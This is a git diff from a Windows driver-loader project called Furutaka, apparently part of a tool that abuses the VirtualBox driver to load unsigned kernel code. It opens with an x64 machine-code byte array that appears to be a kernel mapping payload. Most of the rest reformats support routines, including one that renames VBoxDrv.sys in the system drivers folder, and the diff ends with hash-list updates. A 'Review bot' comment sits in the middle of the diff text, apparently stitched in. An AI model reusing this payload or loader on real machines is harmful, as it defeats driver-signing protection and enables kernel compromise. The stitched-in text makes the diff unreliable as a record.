0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 
0x44, 0x00, 0x00, - 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, + 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, + 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, + 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, + 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, + 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, + 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, + 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, + 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 
0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, + 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, + 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, + 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, + 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, + 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, + 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, + 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 }; diff --git a/Source/Furutaka/sup.c b/Source/Furutaka/sup.c index b1d4b91..c23db86 100644 --- a/Source/Furutaka/sup.c +++ b/Source/Furutaka/sup.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -25,43 +25,43 @@ * */ PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ) + _In_ SYSTEM_INFORMATION_CLASS InfoClass +) { - INT c = 0; - PVOID Buffer = NULL; - ULONG Size = 0x1000; - NTSTATUS status; - ULONG memIO; - PVOID hHeap = NtCurrentPeb()->ProcessHeap; + INT c = 0; + PVOID Buffer = NULL; + ULONG Size = 0x1000; + NTSTATUS status; + ULONG memIO; + PVOID hHeap = NtCurrentPeb()->ProcessHeap; - do { - Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); - if (Buffer != NULL) { - status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); - } - else { - return NULL; - } - if (status == STATUS_INFO_LENGTH_MISMATCH) { - RtlFreeHeap(hHeap, 0, Buffer); - Size *= 2; - c++; - if (c > 100) { - status = STATUS_SECRET_TOO_LONG; - break; - } - } - } while (status == STATUS_INFO_LENGTH_MISMATCH); + do { + Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); + if (Buffer != NULL) { + status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); + } + else { + return NULL; + } + if (status == STATUS_INFO_LENGTH_MISMATCH) { + RtlFreeHeap(hHeap, 0, Buffer); + Size *= 2; + c++; + if (c > 100) { + status = STATUS_SECRET_TOO_LONG; + break; + } + } + } while (status == STATUS_INFO_LENGTH_MISMATCH); - if (NT_SUCCESS(status)) { - return Buffer; - } + if (NT_SUCCESS(status)) { + return Buffer; + } - if (Buffer) { - RtlFreeHeap(hHeap, 0, Buffer); - } - return NULL; + if (Buffer) { + RtlFreeHeap(hHeap, 0, Buffer); + } + return NULL; } /* 
@@ -73,19 +73,19 @@ PVOID supGetSystemInfo( * */ ULONG_PTR supGetNtOsBase( - VOID - ) + VOID +) { - PRTL_PROCESS_MODULES miSpace; - ULONG_PTR NtOsBase = 0; + PRTL_PROCESS_MODULES miSpace; + ULONG_PTR NtOsBase = 0; - miSpace = supGetSystemInfo(SystemModuleInformation); - while (miSpace != NULL) { - NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); - break; - } - return NtOsBase; + miSpace = supGetSystemInfo(SystemModuleInformation); + while (miSpace != NULL) { + NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); + break; + } + return NtOsBase; } /* @@ -97,34 +97,34 @@ ULONG_PTR supGetNtOsBase( * */ PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ) + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +) { - NTSTATUS status; - ULONG_PTR IdPath[3]; - IMAGE_RESOURCE_DATA_ENTRY *DataEntry; - PBYTE Data = NULL; - ULONG SizeOfData = 0; + NTSTATUS status; + ULONG_PTR IdPath[3]; + IMAGE_RESOURCE_DATA_ENTRY *DataEntry; + PBYTE Data = NULL; + ULONG SizeOfData = 0; - if (DllHandle != NULL) { + if (DllHandle != NULL) { - IdPath[0] = (ULONG_PTR)RT_RCDATA; //type - IdPath[1] = ResourceId; //id - IdPath[2] = 0; //lang + IdPath[0] = (ULONG_PTR)RT_RCDATA; //type + IdPath[1] = ResourceId; //id + IdPath[2] = 0; //lang - status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); - if (NT_SUCCESS(status)) { - status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); - if (NT_SUCCESS(status)) { - if (DataSize) { - *DataSize = SizeOfData; - } - } - } - } - return Data; + status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); + if (NT_SUCCESS(status)) { + status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); + if (NT_SUCCESS(status)) { + if (DataSize) { + *DataSize = SizeOfData; + } + } + } + } + return Data; } /* 
@@ -136,39 +136,39 @@ PBYTE supQueryResourceData( * */ BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ) + _In_ BOOL bRestore +) { - BOOL bResult = FALSE; - WCHAR szOldDriverName[MAX_PATH * 2]; - WCHAR szNewDriverName[MAX_PATH * 2]; - WCHAR szDriverDirName[MAX_PATH * 2]; + BOOL bResult = FALSE; + WCHAR szOldDriverName[MAX_PATH * 2]; + WCHAR szNewDriverName[MAX_PATH * 2]; + WCHAR szDriverDirName[MAX_PATH * 2]; - if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { - return FALSE; - } + if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { + return FALSE; + } - _strcat(szDriverDirName, TEXT("\\drivers\\")); + _strcat(szDriverDirName, TEXT("\\drivers\\")); - if (bRestore) { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); - if (PathFileExists(szOldDriverName)) { - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - } - else { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - return bResult; + if (bRestore) { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); + if (PathFileExists(szOldDriverName)) { + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + } + else { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + 
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + return bResult; } /* 
@@ -180,93 +180,93 @@ BOOL supBackupVBoxDrv( * */ SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ) + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +) { - NTSTATUS Status; - DWORD dwFlag; - HANDLE hFile = NULL; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING NtFileName; - IO_STATUS_BLOCK IoStatus; - LARGE_INTEGER Position; - ACCESS_MASK DesiredAccess; - PLARGE_INTEGER pPosition = NULL; - ULONG_PTR nBlocks, BlockIndex; - ULONG BlockSize, RemainingSize; - PBYTE ptr = (PBYTE)Buffer; - SIZE_T BytesWritten = 0; + NTSTATUS Status; + DWORD dwFlag; + HANDLE hFile = NULL; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING NtFileName; + IO_STATUS_BLOCK IoStatus; + LARGE_INTEGER Position; + ACCESS_MASK DesiredAccess; + PLARGE_INTEGER pPosition = NULL; + ULONG_PTR nBlocks, BlockIndex; + ULONG BlockSize, RemainingSize; + PBYTE ptr = (PBYTE)Buffer; + SIZE_T BytesWritten = 0; - if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) - return 0; + if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) + return 0; - DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; - dwFlag = FILE_OVERWRITE_IF; + DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; + dwFlag = FILE_OVERWRITE_IF; - if (Append == TRUE) { - DesiredAccess |= FILE_READ_ACCESS; - dwFlag = FILE_OPEN_IF; - } + if (Append != FALSE) { + DesiredAccess |= FILE_READ_ACCESS; + dwFlag = FILE_OPEN_IF; + } - InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); + InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); - __try { - Status = NtCreateFile(&hFile, DesiredAccess, &attr, - &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, - FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); + __try { + Status = NtCreateFile(&hFile, DesiredAccess, &attr, + &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, 
+ FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); - if (!NT_SUCCESS(Status)) - __leave; + if (!NT_SUCCESS(Status)) + __leave; - pPosition = NULL; + pPosition = NULL; - if (Append == TRUE) { - Position.LowPart = FILE_WRITE_TO_END_OF_FILE; - Position.HighPart = -1; - pPosition = &Position; - } + if (Append != FALSE) { + Position.LowPart = FILE_WRITE_TO_END_OF_FILE; + Position.HighPart = -1; + pPosition = &Position; + } - if (Size < 0x80000000) { - BlockSize = (ULONG)Size; - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + if (Size < 0x80000000) { + BlockSize = (ULONG)Size; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - BytesWritten += IoStatus.Information; - } - else { - BlockSize = 0x7FFFFFFF; - nBlocks = (Size / BlockSize); - for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { + BytesWritten += IoStatus.Information; + } + else { + BlockSize = 0x7FFFFFFF; + nBlocks = (Size / BlockSize); + for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - ptr += BlockSize; - BytesWritten += IoStatus.Information; - } - RemainingSize = Size % BlockSize; - if (RemainingSize != 0) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; - BytesWritten += IoStatus.Information; - } - } - } - __finally { - if (hFile != NULL) { - if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus); - NtClose(hFile); - } - RtlFreeUnicodeString(&NtFileName); - } - return BytesWritten; + ptr += BlockSize; + BytesWritten += IoStatus.Information; + } + RemainingSize = (ULONG)(Size % 
BlockSize); + if (RemainingSize != 0) { + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + BytesWritten += IoStatus.Information; + } + } + } + __finally { + if (hFile != NULL) { + if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus); + NtClose(hFile); + } + RtlFreeUnicodeString(&NtFileName); + } + return BytesWritten; } /* @@ -278,30 +278,30 @@ SIZE_T supWriteBufferToFile( * */ NTSTATUS NTAPI supDetectObjectCallback( - _In_ POBJECT_DIRECTORY_INFORMATION Entry, - _In_ PVOID CallbackParam - ) + _In_ POBJECT_DIRECTORY_INFORMATION Entry, + _In_ PVOID CallbackParam +) { - POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; + POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; - if (Entry == NULL) { - return STATUS_INVALID_PARAMETER_1; - } + if (Entry == NULL) { + return STATUS_INVALID_PARAMETER_1; + } - if (CallbackParam == NULL) { - return STATUS_INVALID_PARAMETER_2; - } + if (CallbackParam == NULL) { + return STATUS_INVALID_PARAMETER_2; + } - if (Param->Buffer == NULL || Param->BufferSize == 0) { - return STATUS_MEMORY_NOT_ALLOCATED; - } + if (Param->Buffer == NULL || Param->BufferSize == 0) { + return STATUS_MEMORY_NOT_ALLOCATED; + } - if (Entry->Name.Buffer) { - if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { - return STATUS_SUCCESS; - } - } - return STATUS_UNSUCCESSFUL; + if (Entry->Name.Buffer) { + if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { + return STATUS_SUCCESS; + } + } + return STATUS_UNSUCCESSFUL; } /* 
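Review bot: DesiredAccess at the top of supWriteBufferToFile is assembled from FILE_WRITE_ACCESS and FILE_READ_ACCESS, which are the device-IOCTL access-type macros rather than file access rights; they coincide numerically with FILE_WRITE_DATA and FILE_READ_DATA, so the NtCreateFile call works, but the intent reads better as `DesiredAccess = FILE_WRITE_DATA | SYNCHRONIZE;` with `DesiredAccess |= FILE_APPEND_DATA;` in the Append branch, which also drops a read right this write path does not appear to use. The switch to `Append != FALSE` / `Flush != FALSE` and the `(ULONG)` cast on the remainder are correct. Since the function still returns the running BytesWritten after a failed NtWriteFile, the header comment above the hunk should say that callers must compare the result with Size rather than test it for non-zero.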
@@ -313,87 +313,87 @@ NTSTATUS NTAPI supDetectObjectCallback( * */ NTSTATUS NTAPI supEnumSystemObjects( - _In_opt_ LPWSTR pwszRootDirectory, - _In_opt_ HANDLE hRootDirectory, - _In_ PENUMOBJECTSCALLBACK CallbackProc, - _In_opt_ PVOID CallbackParam - ) + _In_opt_ LPWSTR pwszRootDirectory, + _In_opt_ HANDLE hRootDirectory, + _In_ PENUMOBJECTSCALLBACK CallbackProc, + _In_opt_ PVOID CallbackParam +) { - BOOL cond = TRUE; - ULONG ctx, rlen; - HANDLE hDirectory = NULL; - NTSTATUS status; - NTSTATUS CallbackStatus; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING sname; + BOOL cond = TRUE; + ULONG ctx, rlen; + HANDLE hDirectory = NULL; + NTSTATUS status; + NTSTATUS CallbackStatus; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING sname; - POBJECT_DIRECTORY_INFORMATION objinf; + POBJECT_DIRECTORY_INFORMATION objinf; - if (CallbackProc == NULL) { - return STATUS_INVALID_PARAMETER_4; - } + if (CallbackProc == NULL) { + return STATUS_INVALID_PARAMETER_4; + } - status = STATUS_UNSUCCESSFUL; + status = STATUS_UNSUCCESSFUL; - __try { + __try { - // We can use root directory. - if (pwszRootDirectory != NULL) { - RtlSecureZeroMemory(&sname, sizeof(sname)); - RtlInitUnicodeString(&sname, pwszRootDirectory); - InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); - status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); - if (!NT_SUCCESS(status)) { - return status; - } - } - else { - if (hRootDirectory == NULL) { - return STATUS_INVALID_PARAMETER_2; - } - hDirectory = hRootDirectory; - } + // We can use root directory. 
+ if (pwszRootDirectory != NULL) { + RtlSecureZeroMemory(&sname, sizeof(sname)); + RtlInitUnicodeString(&sname, pwszRootDirectory); + InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); + status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); + if (!NT_SUCCESS(status)) { + return status; + } + } + else { + if (hRootDirectory == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + hDirectory = hRootDirectory; + } - // Enumerate objects in directory. - ctx = 0; - do { + // Enumerate objects in directory. + ctx = 0; + do { - rlen = 0; - status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); - if (status != STATUS_BUFFER_TOO_SMALL) - break; + rlen = 0; + status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); + if (status != STATUS_BUFFER_TOO_SMALL) + break; - objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); - if (objinf == NULL) - break; + objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); + if (objinf == NULL) + break; - status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); - if (!NT_SUCCESS(status)) { - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - break; - } + status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); + if (!NT_SUCCESS(status)) { + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + break; + } - CallbackStatus = CallbackProc(objinf, CallbackParam); + CallbackStatus = CallbackProc(objinf, CallbackParam); - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - if (NT_SUCCESS(CallbackStatus)) { - status = STATUS_SUCCESS; - break; - } + if (NT_SUCCESS(CallbackStatus)) { + status = STATUS_SUCCESS; + break; + } - } while (cond); + } while (cond); - if (hDirectory != NULL) { - NtClose(hDirectory); - } + if (hDirectory != NULL) { + NtClose(hDirectory); + } - } - __except 
(EXCEPTION_EXECUTE_HANDLER) { - status = STATUS_ACCESS_VIOLATION; - } + } + __except (EXCEPTION_EXECUTE_HANDLER) { + status = STATUS_ACCESS_VIOLATION; + } - return status; + return status; } /* @@ -405,18 +405,18 @@ NTSTATUS NTAPI supEnumSystemObjects( * */ BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ) + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +) { - OBJSCANPARAM Param; + OBJSCANPARAM Param; - if (ObjectName == NULL) { - return FALSE; - } + if (ObjectName == NULL) { + return FALSE; + } - Param.Buffer = ObjectName; - Param.BufferSize = (ULONG)_strlen(ObjectName); + Param.Buffer = ObjectName; + Param.BufferSize = (ULONG)_strlen(ObjectName); - return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); + return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); } diff --git a/Source/Furutaka/sup.h b/Source/Furutaka/sup.h index e1cd4fa..10bab5d 100644 --- a/Source/Furutaka/sup.h +++ b/Source/Furutaka/sup.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * Common header file for the program support routines. * 
@@ -21,39 +21,39 @@ typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); typedef struct _OBJSCANPARAM { - PWSTR Buffer; - ULONG BufferSize; + PWSTR Buffer; + ULONG BufferSize; } OBJSCANPARAM, *POBJSCANPARAM; ULONG_PTR supGetNtOsBase( - VOID - ); + VOID +); PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ); + _In_ SYSTEM_INFORMATION_CLASS InfoClass +); PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ); + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +); BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ); + _In_ BOOL bRestore +); SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ); + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +); BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ); + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +); #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) diff --git a/TDL.sha256 b/TDL.sha256 index 2d5ae90..8a8ffcf 100644 --- a/TDL.sha256 +++ b/TDL.sha256 
@@ -1,29 +1,36 @@ c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys 4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys -48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe +9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln 01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln 2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln 